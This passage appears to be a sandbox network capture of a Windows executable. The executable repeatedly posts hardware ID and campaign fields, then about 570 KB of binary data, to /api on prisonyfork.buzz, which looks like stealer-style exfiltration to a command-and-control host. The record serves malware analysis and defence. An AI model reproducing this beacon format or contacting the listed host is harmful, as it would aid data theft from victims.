name="lid"yau6Na--6299960613--SH1RINP2KContent
2024-12-27 14:35:46 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p1cuescu7cln1ugvqe5m0n419a; expires=Tue, 22 Apr 2025 08:22:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uoNGZpDZQE78OlP%2BOYiOiVlPHm%2B0EPunEawbdf1iONx6bdPGUsZySY%2BJQ0VSpkbKUkId6Ukf%2B5b2zSily9VKTF6QIlmnVMRr3yCbh3N5ZMKak9yOpBYTx%2FnMKelNdPymc%2BEv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a09fa9ac64301-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2180&min_rtt=2169&rtt_var=836&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13717&delivery_rate=1292035&cwnd=166&unsent_bytes=0&cid=9fb4224fe9982b1a&ts=979&x=0"
2024-12-27 14:35:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 14:35:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49782	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:47 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LYXP2HB4CIIUA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15052 Host: prisonyfork.buzz
2024-12-27 14:35:47 UTC	15052	OUT	Data Raw: 2d 2d 4c 59 58 50 32 48 42 34 43 49 49 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 36 37 39 43 31 36 39 35 36 45 46 42 37 32 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 4c 59 58 50 32 48 42 34 43 49 49 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 59 58 50 32 48 42 34 43 49 49 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 0d 0a 2d 2d 4c 59 58 50 32 48 Data Ascii: --LYXP2HB4CIIUAContent-Disposition: form-data; name="hwid"99679C16956EFB728B85154C9421A187--LYXP2HB4CIIUAContent-Disposition: form-data; name="pid"2--LYXP2HB4CIIUAContent-Disposition: form-data; name="lid"yau6Na--6299960613--LYXP2H
2024-12-27 14:35:48 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=decoknba121sh54a9fhqigbv95; expires=Tue, 22 Apr 2025 08:22:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pUR1s86p1UTmasD%2BCpJh1daO4C7lFO1e3yji7TLrRvu1AeJ0Q7Ksjp53FoprJyVtu8tuKfBUtyWLNAV7cGFQ2NFiLGth55pT1LmIDR7USDZnopUrXSKZjDagG62ccZL2qpHc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a0a09fc5c8c11-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1899&rtt_var=723&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15987&delivery_rate=1537651&cwnd=203&unsent_bytes=0&cid=31dbdd7a853650df&ts=902&x=0"
2024-12-27 14:35:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 14:35:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49790	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:50 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CTNJVND1SN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20524 Host: prisonyfork.buzz
2024-12-27 14:35:50 UTC	15331	OUT	Data Raw: 2d 2d 43 54 4e 4a 56 4e 44 31 53 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 36 37 39 43 31 36 39 35 36 45 46 42 37 32 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 43 54 4e 4a 56 4e 44 31 53 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 54 4e 4a 56 4e 44 31 53 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 0d 0a 2d 2d 43 54 4e 4a 56 4e 44 31 53 4e 0d 0a 43 6f 6e Data Ascii: --CTNJVND1SNContent-Disposition: form-data; name="hwid"99679C16956EFB728B85154C9421A187--CTNJVND1SNContent-Disposition: form-data; name="pid"3--CTNJVND1SNContent-Disposition: form-data; name="lid"yau6Na--6299960613--CTNJVND1SNCon
2024-12-27 14:35:50 UTC	5193	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2024-12-27 14:35:51 UTC	1119	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f1nhndcsslp7bn32c1qsl78sl3; expires=Tue, 22 Apr 2025 08:22:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xklVxtUgYHsLtFr2yUkrILeLZwcGo0XT0M3SIpXxNNOMdmrhS23BERM71IYoRYeqWx0PHkqqhYa7hKfbYk4v7IdVRgEBtillWLHj7zsX96g2rglcpR6yR3G5C0ZDH0C5dOZU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a0a1859ef42fd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1730&rtt_var=674&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21478&delivery_rate=1593886&cwnd=248&unsent_bytes=0&cid=c2e555e134e39ceb&ts=997&x=0"
2024-12-27 14:35:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 14:35:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49796	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:52 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OAOG7XGDR905YG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1240 Host: prisonyfork.buzz
2024-12-27 14:35:52 UTC	1240	OUT	Data Raw: 2d 2d 4f 41 4f 47 37 58 47 44 52 39 30 35 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 36 37 39 43 31 36 39 35 36 45 46 42 37 32 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 4f 41 4f 47 37 58 47 44 52 39 30 35 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 41 4f 47 37 58 47 44 52 39 30 35 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 0d 0a 2d 2d 4f 41 4f Data Ascii: --OAOG7XGDR905YGContent-Disposition: form-data; name="hwid"99679C16956EFB728B85154C9421A187--OAOG7XGDR905YGContent-Disposition: form-data; name="pid"1--OAOG7XGDR905YGContent-Disposition: form-data; name="lid"yau6Na--6299960613--OAO
2024-12-27 14:35:54 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q9mr168htqp64579v7n6oviaoe; expires=Tue, 22 Apr 2025 08:22:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6hHzZbQMpfGC%2Fl9rXHK0OvJ4Npey0WELasnIMPbDX5jcIH6SM%2BKYFRkP%2Br5RtjvY7cW5fxyUf9dwXTwAgCOA1d4uC033Kf4uoUXQngTmLvtBDuIwxyPbkYP5O2gJ2F25Z5I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a0a28e9944271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2153&delivery_rate=1828428&cwnd=252&unsent_bytes=0&cid=271c5dcf57bf44af&ts=1263&x=0"
2024-12-27 14:35:54 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 14:35:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49804	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:56 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6ULLK7HUCF7G7Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570559 Host: prisonyfork.buzz
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: 2d 2d 36 55 4c 4c 4b 37 48 55 43 46 37 47 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 36 37 39 43 31 36 39 35 36 45 46 42 37 32 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 36 55 4c 4c 4b 37 48 55 43 46 37 47 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 55 4c 4c 4b 37 48 55 43 46 37 47 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 0d 0a 2d 2d 36 55 4c Data Ascii: --6ULLK7HUCF7G7QContent-Disposition: form-data; name="hwid"99679C16956EFB728B85154C9421A187--6ULLK7HUCF7G7QContent-Disposition: form-data; name="pid"1--6ULLK7HUCF7G7QContent-Disposition: form-data; name="lid"yau6Na--6299960613--6UL
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be 01 24 82 4f 0d 94 66 25 9d 73 4e c7 e6 6a 21 8e 1c fa 74 01 58 Data Ascii: Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw\|YucmjpDayvN$"zsL'O=?}M1$Of%sNj!tX
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29 d8 db 62 b0 b3 e7 94 52 d9 52 e3 26 16 0e 7a fa d3 3b 31 af 76 Data Ascii: h1JF^\H*Qy6Gqh;7:o\|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,\|WM8^#n\|zTG)bRR&z;1v
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06 0a e3 ff 4c 2f 4b 23 66 5a 82 36 a3 64 16 74 85 5c 95 be 0e 11 Data Ascii: D(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=L/K#fZ6dt\
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9 cf 47 b5 68 6e 0a 2a 30 27 2d 9c 21 98 9e 38 15 91 4e d1 ae e0 Data Ascii: -^5vE!/W3tgF_6co\\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422Ghn*0'-!8N
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00 a2 8e f4 ae e9 41 43 92 e9 24 36 c5 05 46 3e d7 c1 c1 ee 99 b5 Data Ascii: ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN\|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9AC$6F>
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60 be b3 30 9f 12 d9 24 7d e0 37 d6 8d ae 11 03 66 2d 1e fb 60 9b Data Ascii: 3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~\|dK 5~}`0$}7f-`
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf c8 c3 1a 91 7d 19 43 b6 b3 ec d9 1f 22 ea b4 87 63 e0 73 7b a5 Data Ascii: wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3\|'o-#M}C"cs{
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2 fd 6f b5 a8 b0 ea 8b 78 8f 01 ea 75 1f b5 65 f8 6b fb 51 84 e7 Data Ascii: 2(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f\|HHH"2,q\|FQyD:vPQ}=/rh+sJg+.*zrti$-7:ivoxuekQ
2024-12-27 14:35:56 UTC	15331	OUT	Data Raw: e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a ea 5a 60 86 82 cb 93 77 50 d3 fb 9a 97 